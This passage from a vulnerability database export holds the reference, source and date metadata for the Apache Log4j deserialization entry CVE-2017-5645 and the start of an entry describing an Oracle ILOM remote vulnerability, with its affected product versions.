"http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { trust: 1.4, url: "https://issues.apache.org/jira/browse/log4j2-1863", }, { trust: 1.4, url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { trust: 1.4, url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { trust: 1.4, url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { trust: 1.2, url: "https://access.redhat.com/errata/rhsa-2017:1801", }, { trust: 1.2, url: "https://access.redhat.com/errata/rhsa-2017:2423", }, { trust: 1.2, url: "https://access.redhat.com/errata/rhsa-2017:2633", }, { trust: 1.2, url: "https://access.redhat.com/errata/rhsa-2017:2637", }, { trust: 1.2, url: "https://access.redhat.com/errata/rhsa-2017:2638", }, { trust: 1.2, url: 
"https://access.redhat.com/errata/rhsa-2017:2811", }, { trust: 1.2, url: "https://access.redhat.com/errata/rhsa-2017:2889", }, { trust: 1.2, url: "https://access.redhat.com/errata/rhsa-2019:1545", }, { trust: 1.1, url: "http://www.securityfocus.com/bid/97702", }, { trust: 1.1, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html", }, { trust: 1.1, url: "https://security.netapp.com/advisory/ntap-20180726-0002/", }, { trust: 1.1, url: "https://security.netapp.com/advisory/ntap-20181107-0002/", }, { trust: 1.1, url: "https://www.oracle.com/security-alerts/cpuapr2021.html", }, { trust: 1.1, url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { trust: 1.1, url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { trust: 1.1, url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { trust: 1.1, url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { trust: 1.1, url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { trust: 1.1, url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { trust: 1.1, url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { trust: 1.1, url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { trust: 1.1, url: "http://www.openwall.com/lists/oss-security/2019/12/19/2", }, { trust: 1.1, url: "https://access.redhat.com/errata/rhsa-2017:1417", }, { trust: 1.1, url: "https://access.redhat.com/errata/rhsa-2017:1802", }, { trust: 1.1, url: "https://access.redhat.com/errata/rhsa-2017:2635", }, { trust: 1.1, url: "https://access.redhat.com/errata/rhsa-2017:2636", }, { trust: 1.1, url: "https://access.redhat.com/errata/rhsa-2017:2808", }, { trust: 1.1, url: "https://access.redhat.com/errata/rhsa-2017:2809", }, { trust: 1.1, url: "https://access.redhat.com/errata/rhsa-2017:2810", }, { trust: 1.1, url: "https://access.redhat.com/errata/rhsa-2017:2888", }, { trust: 1.1, url: 
"https://access.redhat.com/errata/rhsa-2017:3244", }, { trust: 1.1, url: "https://access.redhat.com/errata/rhsa-2017:3399", }, { trust: 1.1, url: "https://access.redhat.com/errata/rhsa-2017:3400", }, { trust: 1.1, url: "http://www.securitytracker.com/id/1040200", }, { trust: 1.1, url: "http://www.securitytracker.com/id/1041294", }, { trust: 1.1, url: "https://access.redhat.com/security/cve/cve-2017-5645", }, { trust: 1, url: "https://lists.apache.org/thread.html/r746fbc3fc13aee292ae6851f7a5080f592fa3a67b983c6887cdb1fc5%40%3cdev.tika.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/re8c21ed9dd218c217d242ffa90778428e446b082b5e1c29f567e8374%40%3cissues.activemq.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/rf2567488cfc9212b42e34c6393cfa1c14e30e4838b98dda84d71041f%40%3cdev.tika.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/e8fb7d76a244ee997ba4b217d6171227f7c2521af8c7c5b16cba27bc%40%3cdev.logging.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r3784834e80df2f284577a5596340fb84346c91a2dea6a073e65e3397%40%3cissues.activemq.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3cissues.bookkeeper.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r0831e2e52a390758ce39a6193f82c11c295175adce6e6307de28c287%40%3cissues.beam.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/rdbd579dc223f06af826d7de340218ee2f80d8b43fa7e4decb2a63f44%40%3cgithub.beam.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/ra9a682bc0a8dff1c5cefdef31c7c25f096d9121207cf2d74e2fc563d%40%3ccommits.logging.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/rcbb79023a7c8494cb389cd3d95420fa9e0d531ece0b780b8c1f99422%40%3ccommits.doris.apache.org%3e", }, { trust: 1, url: 
"https://lists.apache.org/thread.html/r61590890edcc64140e0c606954b29a063c3d08a2b41d447256d51a78%40%3cissues.activemq.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/277b4b5c2b0e06a825ccec565fa65bd671f35a4d58e3e2ec5d0618e1%40%3cdev.tika.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/6114ce566200d76e3cc45c521a62c2c5a4eac15738248f58a99f622c%40%3cissues.activemq.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3cissues.geode.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r3d666e4e8905157f3c046d31398b04f2bfd4519e31f266de108c6919%40%3cissues.activemq.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/8ab32b4c9f1826f20add7c40be08909de9f58a89dc1de9c09953f5ac%40%3cissues.activemq.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r2ff63f210842a3c5e42f03a35d8f3a345134d073c80a04077341c211%40%3cissues.activemq.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r23369fd603eb6d62d3b883a0a28d12052dcbd1d6d531137124cd7f83%40%3cgithub.beam.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/rb1b29aee737e1c37fe1d48528cb0febac4f5deed51f5412e6fdfe2bf%40%3cissues.activemq.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r9d5c1b558a15d374bd5abd2d3ae3ca7e50e796a0efdcf91e9c5b4cdd%40%3cgithub.beam.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r3a85514a518f3080ab1fc2652cfe122c2ccf67cfb32356acb1b08fe8%40%3cdev.tika.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/rbfa7a0742be4981a3f9356a23d0e1a5f2e1eabde32a1a3d8e41420f8%40%3cgithub.beam.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/44491fb9cc19acc901f7cff34acb7376619f15638439416e3e14761c%40%3cdev.tika.apache.org%3e", }, { trust: 1, url: 
"https://lists.apache.org/thread.html/raedd12dc24412b3780432bf202a2618a21a727788543e5337a458ead%40%3cissues.activemq.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/rd5dbeee4808c0f2b9b51479b50de3cc6adb1072c332a200d9107f13e%40%3cissues.activemq.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r681b4432d0605f327b68b9f8a42662993e699d04614de4851c35ffd1%40%3cdev.tika.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/ra38785cfc0e7f17f8e24bebf775dd032c033fadcaea29e5bc9fffc60%40%3cdev.tika.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r18f1c010b554a3a2d761e8ffffd8674fd4747bcbcf16c643d708318c%40%3cissues.activemq.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r2ce8d26154bea939536e6cf27ed02d3192bf5c5d04df885a80fe89b3%40%3cissues.activemq.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/0dcca05274d20ef2d72584edcf8c917bbb13dbbd7eb35cae909d02e9%40%3cdev.logging.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r4b25538be50126194cc646836c718b1a4d8f71bd9c912af5b59134ad%40%3cdev.tika.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/eea03d504b36e8f870e8321d908e1def1addda16adda04327fe7c125%40%3cdev.logging.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/rc1eaed7f7d774d5d02f66e49baced31e04827a1293d61a70bd003ca7%40%3cdev.tika.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3ccommits.druid.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/84cc4266238e057b95eb95dfd8b29d46a2592e7672c12c92f68b2917%40%3cannounce.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/479471e6debd608c837b9815b76eab24676657d4444fcfd5ef96d6e6%40%3cdev.tika.apache.org%3e", }, { trust: 1, url: 
"https://lists.apache.org/thread.html/rca24a281000fb681d7e26e5c031a21eb4b0593a7735f781b53dae4e2%40%3cdev.tika.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/rdec0d8ac1f03e6905b0de2df1d5fcdb98b94556e4f6cccf7519fdb26%40%3cdev.tika.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r94b5aae09c4bcff5d06cf641be17b00bd83ba7e10cad737bf16a1b8f%40%3cgithub.beam.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r7bcdc710857725c311b856c0b82cee6207178af5dcde1bd43d289826%40%3cissues.activemq.apache.org%3e", }, { trust: 0.8, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-5645", }, { trust: 0.8, url: "https://www.redhat.com/mailman/listinfo/rhsa-announce", }, { trust: 0.8, url: "https://bugzilla.redhat.com/):", }, { trust: 0.8, url: "https://access.redhat.com/security/team/contact/", }, { trust: 0.8, url: "https://access.redhat.com/security/updates/classification/#important", }, { trust: 0.5, url: "https://access.redhat.com/security/team/key/", }, { trust: 0.5, url: "https://access.redhat.com/articles/11258", }, { trust: 0.4, url: "https://access.redhat.com/security/cve/cve-2017-5664", }, { trust: 0.4, url: "https://nvd.nist.gov/vuln/detail/cve-2017-5664", }, { trust: 0.3, url: "http://seclists.org/oss-sec/2017/q2/78", }, { trust: 0.3, url: "https://git-wip-us.apache.org/repos/asf?p=logging-log4j2.git;h=5dcc19215827db29c993d0305ee2b0d8dd05939d", }, { trust: 0.3, url: "http://www.apache.org/", }, { trust: 0.3, url: "https://logging.apache.org/log4j/2.x/", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2017-7525", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2017-7525", }, { trust: 0.3, url: "https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform?version=6.4/", }, { trust: 0.2, url: "https://issues.jboss.org/):", }, { trust: 0.1, url: 
"https://lists.apache.org/thread.html/8ab32b4c9f1826f20add7c40be08909de9f58a89dc1de9c09953f5ac@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/6114ce566200d76e3cc45c521a62c2c5a4eac15738248f58a99f622c@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r2ff63f210842a3c5e42f03a35d8f3a345134d073c80a04077341c211@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r7bcdc710857725c311b856c0b82cee6207178af5dcde1bd43d289826@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r3d666e4e8905157f3c046d31398b04f2bfd4519e31f266de108c6919@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rd5dbeee4808c0f2b9b51479b50de3cc6adb1072c332a200d9107f13e@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/raedd12dc24412b3780432bf202a2618a21a727788543e5337a458ead@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r61590890edcc64140e0c606954b29a063c3d08a2b41d447256d51a78@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r2ce8d26154bea939536e6cf27ed02d3192bf5c5d04df885a80fe89b3@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/re8c21ed9dd218c217d242ffa90778428e446b082b5e1c29f567e8374@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rb1b29aee737e1c37fe1d48528cb0febac4f5deed51f5412e6fdfe2bf@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r18f1c010b554a3a2d761e8ffffd8674fd4747bcbcf16c643d708318c@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r3784834e80df2f284577a5596340fb84346c91a2dea6a073e65e3397@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: 
"https://lists.apache.org/thread.html/84cc4266238e057b95eb95dfd8b29d46a2592e7672c12c92f68b2917@%3cannounce.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r9d5c1b558a15d374bd5abd2d3ae3ca7e50e796a0efdcf91e9c5b4cdd@%3cgithub.beam.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r94b5aae09c4bcff5d06cf641be17b00bd83ba7e10cad737bf16a1b8f@%3cgithub.beam.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rbfa7a0742be4981a3f9356a23d0e1a5f2e1eabde32a1a3d8e41420f8@%3cgithub.beam.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r23369fd603eb6d62d3b883a0a28d12052dcbd1d6d531137124cd7f83@%3cgithub.beam.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rdbd579dc223f06af826d7de340218ee2f80d8b43fa7e4decb2a63f44@%3cgithub.beam.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r0831e2e52a390758ce39a6193f82c11c295175adce6e6307de28c287@%3cissues.beam.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3cissues.bookkeeper.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rcbb79023a7c8494cb389cd3d95420fa9e0d531ece0b780b8c1f99422@%3ccommits.doris.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3ccommits.druid.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3cissues.geode.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/ra9a682bc0a8dff1c5cefdef31c7c25f096d9121207cf2d74e2fc563d@%3ccommits.logging.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/e8fb7d76a244ee997ba4b217d6171227f7c2521af8c7c5b16cba27bc@%3cdev.logging.apache.org%3e", }, { trust: 0.1, url: 
"https://lists.apache.org/thread.html/eea03d504b36e8f870e8321d908e1def1addda16adda04327fe7c125@%3cdev.logging.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/0dcca05274d20ef2d72584edcf8c917bbb13dbbd7eb35cae909d02e9@%3cdev.logging.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/277b4b5c2b0e06a825ccec565fa65bd671f35a4d58e3e2ec5d0618e1@%3cdev.tika.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/44491fb9cc19acc901f7cff34acb7376619f15638439416e3e14761c@%3cdev.tika.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/479471e6debd608c837b9815b76eab24676657d4444fcfd5ef96d6e6@%3cdev.tika.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rf2567488cfc9212b42e34c6393cfa1c14e30e4838b98dda84d71041f@%3cdev.tika.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r3a85514a518f3080ab1fc2652cfe122c2ccf67cfb32356acb1b08fe8@%3cdev.tika.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rc1eaed7f7d774d5d02f66e49baced31e04827a1293d61a70bd003ca7@%3cdev.tika.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r681b4432d0605f327b68b9f8a42662993e699d04614de4851c35ffd1@%3cdev.tika.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/ra38785cfc0e7f17f8e24bebf775dd032c033fadcaea29e5bc9fffc60@%3cdev.tika.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r746fbc3fc13aee292ae6851f7a5080f592fa3a67b983c6887cdb1fc5@%3cdev.tika.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rdec0d8ac1f03e6905b0de2df1d5fcdb98b94556e4f6cccf7519fdb26@%3cdev.tika.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rca24a281000fb681d7e26e5c031a21eb4b0593a7735f781b53dae4e2@%3cdev.tika.apache.org%3e", }, { trust: 0.1, url: 
"https://lists.apache.org/thread.html/r4b25538be50126194cc646836c718b1a4d8f71bd9c912af5b59134ad@%3cdev.tika.apache.org%3e", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2017-5647", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2017-5647", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2017-5648", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2017-5648", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-2510", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-3258", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2017-15691", }, { trust: 0.1, url: "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions&product=jboss.fuse&version=7.3.1", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-11798", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-11798", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-2510", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.3", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-3258", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2017-15691", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.3/", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en/red-hat-jboss-bpm-suite/", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2017-7957", }, { trust: 0.1, url: "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=bpm.suite&downloadtype=securitypatches&version=6.4", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2017-7957", }, { trust: 0.1, url: "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=appplatform&downloadtype=securitypatches&version=6.4", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2017-7536", }, { trust: 
0.1, url: "https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/version-7.0/installation-guide/", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2015-6644", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2017-7536", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-9970", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2015-6644", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2014-9970", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2017-2582", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/version-7.0/", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2017-2582", }, ], sources: [ { db: "VULHUB", id: "VHN-113848", }, { db: "BID", id: "97702", }, { db: "JVNDB", id: "JVNDB-2017-003152", }, { db: "PACKETSTORM", id: "143499", }, { db: "PACKETSTORM", id: "153344", }, { db: "PACKETSTORM", id: "144597", }, { db: "PACKETSTORM", id: "144019", }, { db: "PACKETSTORM", id: "144013", }, { db: "PACKETSTORM", id: "143670", }, { db: "PACKETSTORM", id: "144359", }, { db: "PACKETSTORM", id: "144018", }, { db: "NVD", id: "CVE-2017-5645", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-113848", }, { db: "BID", id: "97702", }, { db: "JVNDB", id: "JVNDB-2017-003152", }, { db: "PACKETSTORM", id: "143499", }, { db: "PACKETSTORM", id: "153344", }, { db: "PACKETSTORM", id: "144597", }, { db: "PACKETSTORM", id: "144019", }, { db: "PACKETSTORM", id: "144013", }, { db: "PACKETSTORM", id: "143670", }, { db: "PACKETSTORM", id: "144359", }, { db: "PACKETSTORM", id: "144018", }, { db: "NVD", id: "CVE-2017-5645", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: 
"2017-04-17T00:00:00", db: "VULHUB", id: "VHN-113848", }, { date: "2017-04-17T00:00:00", db: "BID", id: "97702", }, { date: "2017-05-18T00:00:00", db: "JVNDB", id: "JVNDB-2017-003152", }, { date: "2017-07-25T23:14:47", db: "PACKETSTORM", id: "143499", }, { date: "2019-06-19T17:19:04", db: "PACKETSTORM", id: "153344", }, { date: "2017-10-12T23:35:39", db: "PACKETSTORM", id: "144597", }, { date: "2017-09-06T04:16:42", db: "PACKETSTORM", id: "144019", }, { date: "2017-09-05T23:23:00", db: "PACKETSTORM", id: "144013", }, { date: "2017-08-07T14:42:00", db: "PACKETSTORM", id: "143670", }, { date: "2017-09-27T06:16:15", db: "PACKETSTORM", id: "144359", }, { date: "2017-09-06T04:16:37", db: "PACKETSTORM", id: "144018", }, { date: "2017-04-17T21:59:00.373000", db: "NVD", id: "CVE-2017-5645", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2020-10-20T00:00:00", db: "VULHUB", id: "VHN-113848", }, { date: "2019-07-17T07:00:00", db: "BID", id: "97702", }, { date: "2017-05-18T00:00:00", db: "JVNDB", id: "JVNDB-2017-003152", }, { date: "2024-11-21T03:28:05.320000", db: "NVD", id: "CVE-2017-5645", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "remote", sources: [ { db: "PACKETSTORM", id: "144019", }, { db: "PACKETSTORM", id: "144013", }, { db: "PACKETSTORM", id: "143670", }, { db: "PACKETSTORM", id: "144018", }, ], trust: 0.4, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Apache Log4j Vulnerable to unreliable data deserialization", sources: [ { db: "JVNDB", id: "JVNDB-2017-003152", }, ], trust: 0.8, }, type: { "@context": { "@vocab": 
"https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "arbitrary", sources: [ { db: "PACKETSTORM", id: "144019", }, { db: "PACKETSTORM", id: "144013", }, { db: "PACKETSTORM", id: "143670", }, { db: "PACKETSTORM", id: "144018", }, ], trust: 0.4, }, }
var-201607-0174
Vulnerability from variot
Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect confidentiality and integrity via vectors related to Emulex. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software: Oracle Application Express Oracle Database Server Oracle Access Manager Oracle BI Publisher Oracle Business Intelligence Enterprise Edition Oracle Directory Server Enterprise Edition Oracle Exalogic Infrastructure Oracle Fusion Middleware Oracle GlassFish Server Oracle HTTP Server Oracle JDeveloper Oracle Portal Oracle WebCenter Sites Oracle WebLogic Server Outside In Technology Hyperion Financial Reporting Enterprise Manager Base Platform Enterprise Manager for Fusion Middleware Enterprise Manager Ops Center Oracle E-Business Suite Oracle Agile Engineering Data Management Oracle Agile PLM Oracle Demand Planning Oracle Engineering Data Management Oracle Transportation Management PeopleSoft Enterprise FSCM PeopleSoft Enterprise PeopleTools JD Edwards EnterpriseOne Tools Siebel Applications Oracle Fusion Applications Oracle Communications ASAP Oracle Communications Core Session Manager Oracle Communications EAGLE Application Processor Oracle Communications Messaging Server Oracle Communications Network Charging and Control Oracle Communications Operations Monitor Oracle Communications Policy Management Oracle Communications Session Border Controller Oracle Communications Unified Session Manager Oracle Enterprise Communications Broker Oracle Banking Platform Oracle Financial Services Lending and Leasing Oracle FLEXCUBE Direct Banking Oracle Health Sciences Clinical Development Center Oracle Health Sciences Information Manager Oracle Healthcare Analytics Data Integration Oracle Healthcare Master Person Index Oracle Documaker Oracle Insurance Calculation Engine Oracle Insurance 
Policy Administration J2EE Oracle Insurance Rules Palette MICROS Retail XBRi Loss Prevention Oracle Retail Central Oracle Back Office Oracle Returns Management Oracle Retail Integration Bus Oracle Retail Order Broker Oracle Retail Service Backbone Oracle Retail Store Inventory Management Oracle Utilities Framework Oracle Utilities Network Management System Oracle Utilities Work and Asset Management Oracle In-Memory Policy Analytics Oracle Policy Automation Oracle Policy Automation Connector for Siebel Oracle Policy Automation for Mobile Devices Primavera Contract Management Primavera P6 Enterprise Project Portfolio Management Oracle Java SE Oracle Java SE Embedded Oracle JRockit 40G 10G 72/64 Ethernet Switch Fujitsu M10-1 Servers Fujitsu M10-4 Servers Fujitsu M10-4S Servers ILOM Oracle Switch ES1-24 Solaris Solaris Cluster SPARC Enterprise M3000 Servers SPARC Enterprise M4000 Servers SPARC Enterprise M5000 Servers SPARC Enterprise M8000 Servers SPARC Enterprise M9000 Servers Sun Blade 6000 Ethernet Switched NEM 24P 10GE Sun Data Center InfiniBand Switch 36 Sun Network 10GE Switch 72p Sun Network QDR InfiniBand Gateway Switch Oracle Secure Global Desktop Oracle VM VirtualBox MySQL Server. Exploiting the most severe of the vulnerabilities addressed by this update may potentially compromise the database server or the host operating system; that sentence describes the update as a whole, whereas the impact stated for this entry is to confidentiality and integrity. This entry concerns Oracle Integrated Lights Out Manager (ILOM), which is prone to a remote security vulnerability. The vulnerability can be exploited over the 'HTTPS' protocol. The 'Emulex' subcomponent is affected. This vulnerability affects the following supported versions: 3.0, 3.1, 3.2.
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201607-0174", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.2", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.1", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", 
